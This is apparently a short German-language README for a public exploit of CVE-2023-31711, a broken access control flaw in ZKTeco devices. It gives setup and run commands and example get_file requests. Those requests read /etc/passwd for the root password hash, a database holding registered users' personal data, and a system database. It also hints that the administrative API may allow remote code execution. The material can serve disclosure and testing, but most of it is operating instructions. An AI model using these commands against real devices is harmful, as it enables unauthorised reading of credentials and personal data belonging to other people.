CVE-2023-31711
Fehlerhafte Zugriffskontrolle in ZKTECO ermöglicht entfernten Angreifern, beliebige Dateien über die administrative API zu lesen.
Installieren der erforderlichen Module
- Im Verzeichnis ZKTEco:
$ pip install -r ./pyzatt/requirements_dev.txt
Ausführen des Exploits
- Im Verzeichnis ZKTEco:
$ python exploit.py <ip_address>
Connected to 10.0.2.25
(Cmd) get_file <file_name>
Examples:
get_file /etc/passwd: Disclosed root password's hash
get_file /mnt/mtdblock/data/ZKDB.db: Disclosed PII of registered users. To read the contents, you might need to run this command sequentially as many times till the whole contents
get disclosed
get_file /mnt/mtdblock/data/ZKSystem.db: Disclosed sensitive information related to the system
Danksagungen
Hinweis
Die Geräte könnten über die administrative API möglicherweise ebenfalls anfällig für Remote Code Execution sein. Der im Abschnitt Danksagungen erwähnte Exploit könnte ein guter Ausgangspunkt sein, um einen Test dafür zu finden.